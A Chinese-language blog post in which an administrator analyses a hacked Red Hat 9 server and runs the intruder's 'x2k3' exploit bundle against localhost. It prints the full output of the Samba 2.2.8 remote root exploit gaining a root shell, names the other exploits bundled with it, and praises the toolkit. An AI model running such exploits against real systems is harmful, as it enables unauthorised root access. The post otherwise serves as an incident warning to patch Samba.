从近日对被黑服务器的安全分析来看，我找到该用户提升权限的工具。他是利用了Samba的安全漏洞提升为了ROOT。

这几天服务器因为要放到公网测试，此时又安装了Samba服务器。结果第二天就发现了服务器被黑

Samba是在RedhatLinux9上默认的版本。使用了该黑客的强大的exploit工具提升为了root。

提升为root，只需要短短的3秒钟

自己汗一个

从服务器的tmp查找到一个x2k3的目录

[bob@learnin9tmp]$cdx2k3/

[bob@learnin9x2k3]$ls

bindftpgkridentdr00tsamba

[bob@learnin9x2k3]$

bindftpgkridentdsamba均为目录，r00t为一个程序，让我们来看看r00t程序的执行情况

[bob@learnin9x2k3]$./r00t

.--------------------------------.

|x2k3/

|WrittenbyNatok/

+------------------------+----.

|Targets:[1]Samba|<=2.2.8

|[2]Bind|8.3.2/8.3.3/9.2.1

|[3]gkrellmd|<2.1.12

|[4]wu_ftpd|<=2.6.1

|[5]identd|1.2

+------------------------+----.

|http://www.natok.de/

|____________________________/

./r00t

[bob@learnin9x2k3]$./r00t127.0.0.11

[*]Rangetoscan:127.0.0.0

[*]SocketConnectingtoport:139

[*]Presscontrol+cforskipping!

Port139IP127.0.0.0->Connectionrefused!

Port139IP127.0.0.1->Connectionok!

[+]Let'ssploit;-)

samba-2.2.8<remoterootexploitbyeSDee(www.netric.org|be)

--------------------------------------------------------------

+Verbosemode.

+Bruteforcemode.(Linux)

+Hostisrunningsamba.

+Usingret:[0xbffffed4]

+Usingret:[0xbffffda8]

+Usingret:[0xbffffc7c]

+Usingret:[0xbffffb50]

+Usingret:[0xbffffa24]

+Usingret:[0xbffff8f8]

+Usingret:[0xbffff7cc]

+Usingret:[0xbffff6a0]

+Usingret:[0xbffff574]

+Usingret:[0xbffff448]

+Usingret:[0xbffff31c]

+Usingret:[0xbffff1f0]

+Usingret:[0xbffff0c4]

+Usingret:[0xbfffef98]

+Usingret:[0xbfffee6c]

+Usingret:[0xbfffed40]

+Usingret:[0xbfffec14]

+Usingret:[0xbfffeae8]

+Usingret:[0xbfffe9bc]

+Usingret:[0xbfffe890]

+Usingret:[0xbfffe764]

+Usingret:[0xbfffe638]

+Usingret:[0xbfffe50c]

+Usingret:[0xbfffe3e0]

+Usingret:[0xbfffe2b4]

+Usingret:[0xbfffe188]

+Worked!

--------------------------------------------------------------

***JEMOETJEMUILHOUWE

Linuxlearnin92.4.20-8#1ThuMar1317:54:28EST2003i686i686i386GNU/Linux

uid=0(root)gid=0(root)groups=99(nobody)

id

uid=0(root)gid=0(root)groups=99(nobody)

看到了吧。就这么轻易的被夺取为root了。

我这只是localhost方式，其实远程也是一样的直接获取为root了。

请各位好好看看自己的Redhat9吧。rpm-qa|grep*****是不是汗已经出来了？

还有bindgkrellmdwu_ftpdidentd这些溢出程序。我不知道这些程序是否就是属于黑客界一些没有公布出来的溢出程序。呵呵！

我的服务器因为没有启动Bind、gkrellmd、wu_ftpd、identd，只启动了默认安装的samba，而且还是在公网上，所以那个黑客就中奖入侵到我的服务器了。可喜可贺，我也是终于找到了这么好的工具。

自己欢喜一下。去看了一下http://www.natok.de/居然发现是中文的网站，究竟里面是谁？很好奇.........

可以说，r00t程序是Natok写的，但是exploit程序不是他写的，他只是将其它的溢出程序分门别类的。做了个友好的界面，不过能搜集到还是很强的。

希望能结识到这个家伙！